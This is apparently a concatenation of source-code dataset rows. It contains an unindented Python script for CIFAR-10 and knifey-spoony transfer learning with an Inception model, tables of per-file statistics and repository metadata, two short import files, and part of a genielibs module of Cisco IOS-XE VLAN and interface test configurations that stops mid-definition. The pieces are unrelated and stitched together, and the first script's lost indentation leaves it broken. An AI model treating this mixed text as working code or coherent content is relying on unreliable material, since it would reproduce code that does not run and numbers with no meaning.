y_test_cls = y_test_cls.astype(np.int32)
y_test = y_test.astype(np.float32)
data = (x_train, y_train_cls, y_train, x_test, y_test_cls, y_test, class_names)
return data
if __name__ == '__main__':
print("load_cifar10")
print()
data = load_cifar10()
x_train, y_train_cls, y_train, x_test, y_test_cls, y_test, class_names = data
print("class_names : ", class_names)
print()
print("x_train.shape : ", x_train.shape)
print("x_test.shape : ", x_test.shape)
print("y_train.shape : ", y_train.shape)
print("y_test.shape : ", y_test.shape)
print("y_train_cls.shape : ", y_train_cls.shape)
print("y_test_cls.shape : ", y_test_cls.shape)
print()
print("x_train.dtype : ", x_train.dtype)
print("x_test.dtype : ", x_test.dtype)
print("y_train.dtype : ", y_train.dtype)
print("y_test.dtypee : ", y_test.dtype)
print("y_train_cls.dtype : ", y_train_cls.dtype)
print("y_test_cls.dtype : ", y_test_cls.dtype)
print()
print("type(x_train) : ", type(x_train))
print("type(x_test) : ", type(x_test))
print("type(y_train) : ", type(y_train))
print("type(y_test) : ", type(y_test))
print("type(y_train_cls) : ", type(y_train_cls))
print("type(y_test_cls) : ", type(y_test_cls))
print()
print("min and max of x_train : ", np.min(x_train), np.max(x_train))
print("min and max of x_test : ", np.min(x_test), np.max(x_test))
print("min and max of y_train : ", np.min(y_train), np.max(y_train))
print("min and max of y_test : ", np.min(y_test), np.max(y_test))
print("min and max of y_train_cls : ", np.min(y_train_cls), np.max(y_train_cls))
print("min and max of y_test_cls : ", np.min(y_test_cls), np.max(y_test_cls))
print()
def load_inception_model():
# make directory if not exist
if not os.path.isdir("data"):
os.mkdir("data")
if not os.path.isdir("data/CIFAR-10"):
os.mkdir("data/CIFAR-10")
if not os.path.isdir("inception"):
os.mkdir("inception")
if not os.path.isdir("img"):
os.mkdir("img")
if not os.path.isdir("graphs"):
os.mkdir("graphs")
# load inception model
inception.maybe_download() # download inception data (85MB) if not exist in inception directory
model = inception.Inception() # load inception model
return model
if __name__ == '__main__':
print("load_inception_model")
print()
def classify(image_path):
""" display image in image_path,
classify using inception model,
and print top 10 predictions """
display(Image(image_path))
plt.close('all') # display image in image_path
pred = model.classify(image_path=image_path) # classify using inception model
model.print_scores(pred=pred, k=10, only_first_name=True) # print top 10 predictions
def plot_resized_image(image_path):
""" get resized image by putting image in image_path into inception model,
and plot resized image """
resized_image = model.get_resized_image(image_path=image_path) # get resized image
plt.imshow(resized_image, interpolation='nearest')
plt.show()
plt.close('all') # plot resized image
model = load_inception_model()
print("Display, Classify, and Print Top 10 Predictions")
classify(image_path="images/cropped_panda.jpg")
plt.close('all')
classify(image_path="images/parrot.jpg")
plt.close('all')
print("Plot Resized Images")
plot_resized_image(image_path="images/parrot.jpg")
plt.close('all')
plot_resized_image(image_path="images/elon_musk_100x100.jpg")
plt.close('all')
def load_cifar10_transfer_values():
# load inception model
model = load_inception_model()
# load cifar10 dataset
data = load_cifar10()
x_train, y_train_cls, y_train, x_test, y_test_cls, y_test, cls_names = data
# compute, cache, and read transfer-values
data_dir = "data/CIFAR-10/"
file_path_cache_train = os.path.join(data_dir, 'inception_cifar10_train.pkl')
file_path_cache_test = os.path.join(data_dir, 'inception_cifar10_test.pkl')
print("Processing Inception transfer-values for training-images ...")
# Scale images because Inception needs pixels to be between 0 and 255,
# while the CIFAR-10 functions return pixels between 0.0 and 1.0
images_scaled = x_train * 255.0
# If transfer-values have already been calculated then reload them,
# otherwise calculate them and save them to a cache-file.
x_train_transfer_values = transfer_values_cache(
cache_path=file_path_cache_train,
images=images_scaled,
model=model)
print("Processing Inception transfer-values for test-images ...")
# Scale images because Inception needs pixels to be between 0 and 255,
# while the CIFAR-10 functions return pixels between 0.0 and 1.0
images_scaled = x_test * 255.0
# If transfer-values have already been calculated then reload them,
# otherwise calculate them and save them to a cache-file.
x_test_transfer_values = transfer_values_cache(
cache_path=file_path_cache_test,
images=images_scaled,
model=model)
data = (x_train, y_train_cls, y_train, x_test, y_test_cls, y_test, cls_names, x_train_transfer_values, x_test_transfer_values)
return data
if __name__ == '__main__':
print("load_cifar10_transfer_values")
print()
data = load_cifar10_transfer_values()
x_train, y_train_cls, y_train, x_test, y_test_cls, y_test, cls_names, x_train_transfer_values, x_test_transfer_values = data
print("x_train.shape : ", x_train.shape)
print("x_train_transfer_values.shape : ", x_train_transfer_values.shape)
print("x_test.shape : ", x_test.shape)
print("x_test_transfer_values.shape : ", x_test_transfer_values.shape)
print("y_train.shape : ", y_train.shape)
print("y_test.shape : ", y_test.shape)
print("y_train_cls.shape : ", y_train_cls.shape)
print("y_test_cls.shape : ", y_test_cls.shape)
print()
print("x_train.dtype : ", x_train.dtype)
print("x_train_transfer_values.dtype : ", x_train_transfer_values.dtype)
print("x_test.dtype : ", x_test.dtype)
print("x_test_transfer_values.dtype : ", x_test_transfer_values.dtype)
print("y_train.dtype : ", y_train.dtype)
print("y_test.dtypee : ", y_test.dtype)
print("y_train_cls.dtype : ", y_train_cls.dtype)
print("y_test_cls.dtype : ", y_test_cls.dtype)
print()
print("type(x_train) : ", type(x_train))
print("type(x_train_transfer_values) : ", type(x_train_transfer_values))
print("type(x_test) : ", type(x_test))
print("type(x_test_transfer_values) : ", type(x_test_transfer_values))
print("type(y_train) : ", type(y_train))
print("type(y_test) : ", type(y_test))
print("type(y_train_cls) : ", type(y_train_cls))
print("type(y_test_cls) : ", type(y_test_cls))
print()
print("min and max of x_train : ", np.min(x_train), np.max(x_train))
print("min and max of x_train_transfer_values : ", np.min(x_train_transfer_values), np.max(x_train_transfer_values))
print("min and max of x_test : ", np.min(x_test), np.max(x_test))
print("min and max of x_test_transfer_values : ", np.min(x_test_transfer_values), np.max(x_test_transfer_values))
print("min and max of y_train : ", np.min(y_train), np.max(y_train))
print("min and max of y_test : ", np.min(y_test), np.max(y_test))
print("min and max of y_train_cls : ", np.min(y_train_cls), np.max(y_train_cls))
print("min and max of y_test_cls : ", np.min(y_test_cls), np.max(y_test_cls))
print()
print('cls_names')
print(cls_names)
print()
def load_knifey():
knifey.maybe_download_and_extract()
dataset = knifey.load()
x_train, y_train_cls, y_train = dataset.get_training_set()
x_test, y_test_cls, y_test = dataset.get_test_set()
cls_names = dataset.class_names
y_train = y_train.astype(np.float32)
y_test = y_test.astype(np.float32)
y_train_cls = y_train_cls.astype(np.int32)
y_test_cls = y_test_cls.astype(np.int32)
data = (x_train, y_train_cls, y_train, x_test, y_test_cls, y_test, cls_names)
return data
if __name__ == '__main__':
print("load_knifey")
print()
def load_images(image_paths):
# Load the images from disk.
images = [imread(path) for path in image_paths]
# Convert to a numpy array and return it.
return np.asarray(images)
def plot_images(images, cls_true, cls_pred=None, smooth=True):
assert len(images) == len(cls_true)
# Create figure with sub-plots.
fig, axes = plt.subplots(3, 3)
# Adjust vertical spacing.
if cls_pred is None:
hspace = 0.3
else:
hspace = 0.6
fig.subplots_adjust(hspace=hspace, wspace=0.3)
# Interpolation type.
if smooth:
interpolation = 'spline16'
else:
interpolation = 'nearest'
for i, ax in enumerate(axes.flat):
# There may be less than 9 images, ensure it doesn't crash.
if i < len(images):
# Plot image.
ax.imshow(images[i],
interpolation=interpolation)
# Name of the true class.
cls_true_name = cls_names[cls_true[i]]
# Show true and predicted classes.
if cls_pred is None:
xlabel = "True: {0}".format(cls_true_name)
else:
# Name of the predicted class.
cls_pred_name = cls_names[cls_pred[i]]
xlabel = "True: {0}\nPred: {1}".format(cls_true_name, cls_pred_name)
# Show the classes as the label on the x-axis.
ax.set_xlabel(xlabel)
# Remove ticks from the plot.
ax.set_xticks([])
ax.set_yticks([])
# Ensure the plot is shown correctly with multiple plots
# in a single Notebook cell.
plt.show()
plt.close('all')
data = load_knifey()
x_train, y_train_cls, y_train, x_test, y_test_cls, y_test, cls_names = data
#print("x_train.shape : ", x_train.shape)
#print("x_test.shape : ", x_test.shape)
print("y_train.shape : ", y_train.shape)
print("y_test.shape : ", y_test.shape)
print("y_train_cls.shape : ", y_train_cls.shape)
print("y_test_cls.shape : ", y_test_cls.shape)
print()
#print("x_train.dtype : ", x_train.dtype)
#print("x_test.dtype : ", x_test.dtype)
print("y_train.dtype : ", y_train.dtype)
print("y_test.dtypee : ", y_test.dtype)
print("y_train_cls.dtype : ", y_train_cls.dtype)
print("y_test_cls.dtype : ", y_test_cls.dtype)
print()
print("type(x_train) : ", type(x_train))
print("type(x_test) : ", type(x_test))
print("type(y_train) : ", type(y_train))
print("type(y_test) : ", type(y_test))
print("type(y_train_cls) : ", type(y_train_cls))
print("type(y_test_cls) : ", type(y_test_cls))
print()
#print("min and max of x_train : ", np.min(x_train), np.max(x_train))
#print("min and max of x_test : ", np.min(x_test), np.max(x_test))
print("min and max of y_train : ", np.min(y_train), np.max(y_train))
print("min and max of y_test : ", np.min(y_test), np.max(y_test))
print("min and max of y_train_cls : ", np.min(y_train_cls), np.max(y_train_cls))
print("min and max of y_test_cls : ", np.min(y_test_cls), np.max(y_test_cls))
print()
print("x_train[0] is not a np.ndarray but a path of an image : ", x_train[0])
print("x_test[0] is not a np.ndarray but a path of an image : ", x_test[0])
print()
print("cls_names : ", cls_names)
print()
images = load_images(image_paths=x_test[0:9])
cls_true = y_test_cls[0:9]
plot_images(images=images, cls_true=cls_true, smooth=True)
print("images.shape : ", images.shape)
print()
def load_knifey_transfer_values():
# load inception model
model = load_inception_model()
# load cifar10 dataset
data = load_knifey()
x_train, y_train_cls, y_train, x_test, y_test_cls, y_test, cls_names = data
# compute, cache, and read transfer-values
data_dir = "data/knifey-spoony/"
file_path_cache_train = os.path.join(data_dir, 'inception-knifey-train.pkl')
file_path_cache_test = os.path.join(data_dir, 'inception-knifey-test.pkl')
print("Processing Inception transfer-values for training-images ...")
# If transfer-values have already been calculated then reload them,
# otherwise calculate them and save them to a cache-file.
x_train_transfer_values = transfer_values_cache(
cache_path=file_path_cache_train,
image_paths=x_train,
model=model)
print("Processing Inception transfer-values for test-images ...")
# If transfer-values have already been calculated then reload them,
# otherwise calculate them and save them to a cache-file.
x_test_transfer_values = transfer_values_cache(
cache_path=file_path_cache_test,
image_paths=x_test,
model=model)
data = (x_train, y_train_cls, y_train, x_test, y_test_cls, y_test, cls_names, x_train_transfer_values, x_test_transfer_values)
return data
if __name__ == '__main__':
print("Data Loading knifey Transfer Values")
print()
data = load_knifey_transfer_values()
x_train, y_train_cls, y_train, x_test, y_test_cls, y_test, cls_names, x_train_transfer_values, x_test_transfer_values = data
#print("x_train.shape : ", x_train.shape)
print("x_train_transfer_values.shape : ", x_train_transfer_values.shape)
#print("x_test.shape : ", x_test.shape)
print("x_test_transfer_values.shape : ", x_test_transfer_values.shape)
print("y_train.shape : ", y_train.shape)
print("y_test.shape : ", y_test.shape)
print("y_train_cls.shape : ", y_train_cls.shape)
print("y_test_cls.shape : ", y_test_cls.shape)
print()
#print("x_train.dtype : ", x_train.dtype)
print("x_train_transfer_values.dtype : ", x_train_transfer_values.dtype)
#print("x_test.dtype : ", x_test.dtype)
print("x_test_transfer_values.dtype : ", x_test_transfer_values.dtype)
print("y_train.dtype : ", y_train.dtype)
print("y_test.dtypee : ", y_test.dtype)
print("y_train_cls.dtype : ", y_train_cls.dtype)
print("y_test_cls.dtype : ", y_test_cls.dtype)
print()
print("type(x_train) : ", type(x_train))
print("type(x_train_transfer_values) : ", type(x_train_transfer_values))
print("type(x_test) : ", type(x_test))
print("type(x_test_transfer_values) : ", type(x_test_transfer_values))
print("type(y_train) : ", type(y_train))
print("type(y_test) : ", type(y_test))
print("type(y_train_cls) : ", type(y_train_cls))
print("type(y_test_cls) : ", type(y_test_cls))
print()
#print("min and max of x_train : ", np.min(x_train), np.max(x_train))
print("min and max of x_train_transfer_values : ", np.min(x_train_transfer_values), np.max(x_train_transfer_values))
#print("min and max of x_test : ", np.min(x_test), np.max(x_test))
print("min and max of x_test_transfer_values : ", np.min(x_test_transfer_values), np.max(x_test_transfer_values))
print("min and max of y_train : ", np.min(y_train), np.max(y_train))
print("min and max of y_test : ", np.min(y_test), np.max(y_test))
print("min and max of y_train_cls : ", np.min(y_train_cls), np.max(y_train_cls))
print("min and max of y_test_cls : ", np.min(y_test_cls), np.max(y_test_cls))
print()
print("x_train[0] is not a np.ndarray but a path of an image : ", x_train[0])
print("x_test[0] is not a np.ndarray but a path of an image : ", x_test[0])
print()
print('cls_names')
print(cls_names)
print()
| 36.622538
| 130
| 0.622322
| 5,171
| 33,473
| 3.725392
| 0.062077
| 0.071013
| 0.045266
| 0.040698
| 0.827398
| 0.785662
| 0.768169
| 0.744498
| 0.730845
| 0.716933
| 0
| 0.017717
| 0.241209
| 33,473
| 913
| 131
| 36.662651
| 0.740738
| 0.08834
| 0
| 0.709428
| 0
| 0
| 0.234441
| 0.024178
| 0
| 0
| 0
| 0
| 0.001546
| 1
| 0.026275
| false
| 0
| 0.027821
| 0
| 0.075734
| 0.474498
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
9cda2464a3fa6ecef6ca200d69be387a5db91ff2
| 130
|
py
|
Python
|
fiction_segmentation/run/__init__.py
|
aklagoo/fiction_segmentation
|
c14d5c380f800a632bc9f3199e69e6b25413e086
|
[
"MIT"
] | null | null | null |
fiction_segmentation/run/__init__.py
|
aklagoo/fiction_segmentation
|
c14d5c380f800a632bc9f3199e69e6b25413e086
|
[
"MIT"
] | null | null | null |
fiction_segmentation/run/__init__.py
|
aklagoo/fiction_segmentation
|
c14d5c380f800a632bc9f3199e69e6b25413e086
|
[
"MIT"
] | null | null | null |
from fiction_segmentation.run.RunManager import _Metrics, _Epoch, _Run
from fiction_segmentation.run.RunBuilder import RunBuilder
| 43.333333
| 70
| 0.876923
| 16
| 130
| 6.8125
| 0.5625
| 0.201835
| 0.422018
| 0.477064
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 130
| 2
| 71
| 65
| 0.908333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
1487cb17b68704ee8d1b3e13629bd150c7e1abde
| 184
|
py
|
Python
|
template_multi_level/__init__.py
|
maryami66/template_multi_level
|
eb81d6c7b7120383b6e160cbfe9d586ba58443e1
|
[
"MIT"
] | null | null | null |
template_multi_level/__init__.py
|
maryami66/template_multi_level
|
eb81d6c7b7120383b6e160cbfe9d586ba58443e1
|
[
"MIT"
] | null | null | null |
template_multi_level/__init__.py
|
maryami66/template_multi_level
|
eb81d6c7b7120383b6e160cbfe9d586ba58443e1
|
[
"MIT"
] | null | null | null |
import template_multi_level
from template_multi_level.level_1.file_1_1 import *
from template_multi_level.level_1.file_1_1 import *
from template_multi_level.level_2.file_2_1 import *
| 36.8
| 51
| 0.875
| 34
| 184
| 4.235294
| 0.235294
| 0.361111
| 0.5
| 0.458333
| 0.743056
| 0.743056
| 0.743056
| 0.743056
| 0.743056
| 0.743056
| 0
| 0.052941
| 0.076087
| 184
| 4
| 52
| 46
| 0.794118
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 12
|
1495b17d98d78f493df3fa851d164e30bfc792b4
| 65,291
|
py
|
Python
|
pkgs/sdk-pkg/src/genie/libs/sdk/triggers/xe_sanity/configurations.py
|
miott/genielibs
|
6464642cdd67aa2367bdbb12561af4bb060e5e62
|
[
"Apache-2.0"
] | 94
|
2018-04-30T20:29:15.000Z
|
2022-03-29T13:40:31.000Z
|
pkgs/sdk-pkg/src/genie/libs/sdk/triggers/xe_sanity/configurations.py
|
miott/genielibs
|
6464642cdd67aa2367bdbb12561af4bb060e5e62
|
[
"Apache-2.0"
] | 67
|
2018-12-06T21:08:09.000Z
|
2022-03-29T18:00:46.000Z
|
pkgs/sdk-pkg/src/genie/libs/sdk/triggers/xe_sanity/configurations.py
|
miott/genielibs
|
6464642cdd67aa2367bdbb12561af4bb060e5e62
|
[
"Apache-2.0"
] | 49
|
2018-06-29T18:59:03.000Z
|
2022-03-10T02:07:59.000Z
|
# python
import copy
class TriggersConfigs():
basic_config = {
'devices': {
'uut': {
'1': {
'config': 'lldp run\n'\
'interface GigabitEthernet1/0/13\n'\
'no shutdown\n'\
'default interface GigabitEthernet2/0/15\n'\
'default interface GigabitEthernet3/0/15\n'\
'no interface vlan 10\n'\
'no interface vlan 11',
'sleep': 300
}
},
'helper': {
'1': {
'config': 'lldp run'
}
}
}
}
basic_unconfig = {
'devices': {
'uut': {
'1': {
'config': 'no lldp run\n'\
'default interface GigabitEthernet1/0/13\n'\
'default interface vlan 1\n'\
'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'default interface GigabitEthernet1/0/17\n'\
'default interface GigabitEthernet2/0/15\n'\
'default interface GigabitEthernet3/0/15\n'\
'no vlan 2\n'\
'no vlan 10\n'\
'no vlan 11\n'\
'no interface vlan 2\n'\
'no interface vlan 10\n'\
'no interface vlan 11',
}
},
'helper': {
'1': {
'config': 'no lldp run\n'\
'default vlan 1\n'\
'default interface vlan 1\n'\
'no vlan 2\n'\
'no vlan 10\n'\
'no vlan 11\n'\
'no interface vlan 2\n'\
'no interface vlan 10\n'\
'no interface vlan 11\n'\
'no ip vrf test1\n'\
'no ip vrf test2\n'\
'no ip vrf test3\n'\
'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'default interface GigabitEthernet1/0/4\n'\
'default interface GigabitEthernet1/0/5\n',
}
}
}
}
switchover_ping = {
'devices': {
'uut': {
'1': {
'config': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'default interface vlan 1\n'\
'ip routing\n'\
'vlan 10\n'\
'state active\n'\
'interface vlan 10\n'\
'ip address 1.1.1.2 255.255.255.0\n'\
'no shut\n'\
'ipv6 unicast-routing\n'\
'interface GigabitEthernet2/0/15\n'\
'switchport access vlan 10\n'\
'switchport mode access\n'\
'no shut\n'\
'vlan 11\n'\
'state active\n'\
'interface vlan 11\n'\
'ip address 2.2.2.2 255.255.255.0\n'\
'no shut\n'\
'interface GigabitEthernet3/0/15\n'\
'switchport access vlan 11\n'\
'switchport mode access\n'\
'no shut\n'\
'do copy running-config startup-config\n'\
'do write memory',
'unconfig': 'default interface GigabitEthernet2/0/15\n'\
'default interface GigabitEthernet3/0/15\n'\
'no vlan 10\n'\
'no vlan 11\n'\
'no interface vlan 10\n'\
'no interface vlan 11',
'sleep': 45
}
},
'helper': {
'1': {
'config': '!\n'\
'ip routing\n'\
'!\n'\
'ip vrf vrf1\n'\
'rd 1:1\n'\
'!\n'\
'ip vrf vrf2\n'\
'rd 1:2\n'\
'!\n'\
'interface GigabitEthernet1/0/4\n'\
'no switchport\n'\
'no ip address\n'\
'ip vrf forwarding vrf1\n'\
'ip address 1.1.1.1 255.255.255.0\n'\
'no shutdown\n'\
'!\n'\
'interface GigabitEthernet1/0/5\n'\
'no switchport\n'\
'no ip address\n'\
'ip vrf forwarding vrf2\n'\
'ip address 2.2.2.1 255.255.255.0\n'\
'no shutdown\n'\
'ip route vrf vrf2 1.1.1.0 255.255.255.0 GigabitEthernet1/0/5 2.2.2.2\n'\
'ip route vrf vrf1 2.2.2.0 255.255.255.0 GigabitEthernet1/0/4 1.1.1.2',
'unconfig': 'default interface GigabitEthernet1/0/4\n'\
'default interface GigabitEthernet1/0/5\n'\
'no ip vrf vrf1\n'\
'no ip vrf vrf2\n'\
'no ip route vrf vrf2 1.1.1.0 255.255.255.0 GigabitEthernet1/0/5 2.2.2.2\n'\
'no ip route vrf vrf1 2.2.2.0 255.255.255.0 GigabitEthernet1/0/4 1.1.1.2',
}
}
}
}
application_sanity_base = '!enable gloabl cef for ipv4 and vrf forwarding\n'\
'ip routing\n'\
'!\n'\
'ip vrf vrf1\n'\
'rd 1:1\n'\
'!\n'\
'ip vrf vrf2\n'\
'rd 1:2\n'\
'!\n'\
'interface GigabitEthernet1/0/1\n'\
'no switchport\n'\
'no ip address\n'\
'ip vrf forwarding vrf1\n'\
'ip address 10.0.0.1 255.255.255.0\n'\
'mac-address 0200.dead.0001\n'\
'no shut\n'\
'!\n'\
'interface GigabitEthernet1/0/2\n'\
'no switchport\n'\
'no ip address\n'\
'ip vrf forwarding vrf2\n'\
'ip address 10.0.0.2 255.255.255.0\n'\
'mac-address 0200.dead.0002\n'\
'no shut\n'\
'!'
l2_int_up = {
'devices': {
'uut': {
'1': {
'config': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'interface GigabitEthernet1/0/15\n'\
'no shut\n'\
'interface GigabitEthernet1/0/16\n'\
'no shut',
'unconfig': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16',
'sleep': 30
}
},
'helper': {
'1': {
'config': application_sanity_base,
'unconfig': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'no ip vrf vrf1\n'\
'no ip vrf vrf2',
}
}
}
}
SVI_L3_ping_native_VLAN = {
'devices': {
'uut': {
'1': {
'config': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'default interface vlan 1\n'\
'interface GigabitEthernet1/0/15\n'\
'switchport\n'\
'switchport access vlan 1\n'\
'no shut\n'\
'interface GigabitEthernet1/0/16\n'\
'switchport\n'\
'switchport access vlan 1\n'\
'no shut\n'\
'interface vlan 1\n'\
'ip address 18.0.1.1 255.255.255.0\n'\
'no shut',
'unconfig': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'default interface vlan 1',
'sleep': 30
}
},
'helper': {
'1': {
'config': application_sanity_base,
'unconfig': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'no ip vrf vrf1\n'\
'no ip vrf vrf2',
},
'2': {
'config': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'default interface vlan 1\n'\
'interface GigabitEthernet1/0/1\n'\
'switchport\n'\
'switchport access vlan 1\n'\
'no shut\n'\
'interface GigabitEthernet1/0/2\n'\
'switchport\n'\
'switchport access vlan 1\n'\
'no shut\n'\
'interface vlan 1\n'\
'ip address 18.0.1.2 255.255.255.0\n'\
'no shut',
'unconfig': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'default interface vlan 1',
}
}
}
}
SVI_L3_ping_VLAN99 = {
'devices': {
'uut': {
'1': {
'config': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'default interface vlan 1\n'\
'interface vlan 99\n'\
'ip address 18.0.1.1 255.255.255.0\n'\
'no shut\n'\
'interface GigabitEthernet1/0/15\n'\
'switchport\n'\
'switchport access vlan 99\n'\
'no shut\n'\
'interface GigabitEthernet1/0/16\n'\
'switchport\n'\
'switchport access vlan 99\n'\
'no shut',
'unconfig': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'no interface vlan 99',
'sleep': 40
}
},
'helper': {
'1': {
'config': application_sanity_base,
'unconfig': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'no ip vrf vrf1\n'\
'no ip vrf vrf2',
},
'2': {
'config': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'default interface vlan 1\n'\
'interface vlan 99\n'\
'ip address 18.0.1.2 255.255.255.0\n'\
'no shut\n'\
'interface GigabitEthernet1/0/1\n'\
'switchport\n'\
'switchport access vlan 99\n'\
'no shut\n'\
'interface GigabitEthernet1/0/2\n'\
'switchport\n'\
'switchport access vlan 99\n'\
'no shut',
'unconfig': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'no interface vlan 99',
}
}
}
}
trunk_config = {
'devices': {
'uut': {
'1': {
'config': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'default interface vlan 1\n'\
'vlan 99\n'\
'state active\n'\
'interface vlan 99\n'\
'ip address 18.0.1.1 255.255.255.0\n'\
'no shut\n'\
'interface GigabitEthernet1/0/15\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 99\n'\
'no shut\n'\
'interface GigabitEthernet1/0/16\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 99\n'\
'no shut',
'unconfig': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'no vlan 99\n'\
'no interface vlan 99',
'sleep': 60
}
},
'helper': {
'1': {
'config': application_sanity_base,
'unconfig': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'no ip vrf vrf1\n'\
'no ip vrf vrf2',
},
'2': {
'config': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'default interface vlan 1\n'\
'vlan 99\n'\
'state active\n'\
'interface vlan 99\n'\
'ip address 18.0.1.2 255.255.255.0\n'\
'no shut\n'\
'interface loopback1\n'\
'ip address 1.1.1.1 255.255.255.0\n'\
'interface GigabitEthernet1/0/1\n'\
'switchport trunk encapsulation dot1q\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 99\n'\
'no shut\n'\
'interface GigabitEthernet1/0/2\n'\
'switchport trunk encapsulation dot1q\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 99\n'\
'no shut',
'unconfig': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'no interface loopback1\n'\
'no vlan 99\n'\
'no interface vlan 99',
}
}
}
}
SVI_L3_ping_VLAN99_Trunk = {
'devices': {
'uut': {
'next_hop': '18.0.1.2',
'1': {
'config': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'default interface vlan 1\n'\
'vlan 99\n'\
'state active\n'\
'interface vlan 99\n'\
'ip address 18.0.1.1 255.255.255.0\n'\
'no shut\n'\
'interface GigabitEthernet1/0/15\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 99\n'\
'no shut\n'\
'interface GigabitEthernet1/0/16\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 99\n'\
'no shut',
'unconfig': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'no vlan 99\n'\
'no interface vlan 99',
'sleep': 50
}
},
'helper': {
'1': {
'config': application_sanity_base,
'unconfig': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'no ip vrf vrf1\n'\
'no ip vrf vrf2',
},
'2': {
'config': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'default interface vlan 1\n'\
'vlan 99\n'\
'state active\n'\
'interface vlan 99\n'\
'ip address {next_hop} 255.255.255.0\n'\
'no shut\n'\
'interface loopback1\n'\
'ip address 1.1.1.1 255.255.255.0\n'\
'interface GigabitEthernet1/0/1\n'\
'switchport trunk encapsulation dot1q\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 99\n'\
'no shut\n'\
'interface GigabitEthernet1/0/2\n'\
'switchport trunk encapsulation dot1q\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 99\n'\
'no shut',
'unconfig': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'no interface loopback1\n'\
'no vlan 99\n'\
'no interface vlan 99',
}
}
}
}
IPv6_Traceroute_VLAN99_Trunk = {
'devices': {
'uut': {
'next_hop': '2001:ABAD:BEEF::2',
'1': {
'config': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'default interface vlan 1\n'\
'vlan 99\n'\
'state active\n'\
'interface vlan 99\n'\
'ipv6 address 2001:ABAD:BEEF::1/64\n'\
'no shut\n'\
'ipv6 unicast-routing\n'\
'interface GigabitEthernet1/0/15\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 99\n'\
'no shut\n'\
'interface GigabitEthernet1/0/16\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 99\n'\
'no shut',
'unconfig': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'no vlan 99\n'\
'no interface vlan 99',
'sleep': 50
}
},
'helper': {
'1': {
'config': application_sanity_base,
'unconfig': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'no ip vrf vrf1\n'\
'no ip vrf vrf2',
},
'2': {
'config': 'default interface GigabitEthernet1/0/2\n'\
'default interface GigabitEthernet1/0/1\n'\
'default interface vlan 1\n'\
'vlan 99\n'\
'state active\n'\
'interface vlan 99\n'\
'ipv6 address 2001:ABAD:BEEF::2/64\n'\
'no shut\n'\
'interface loopback1\n'\
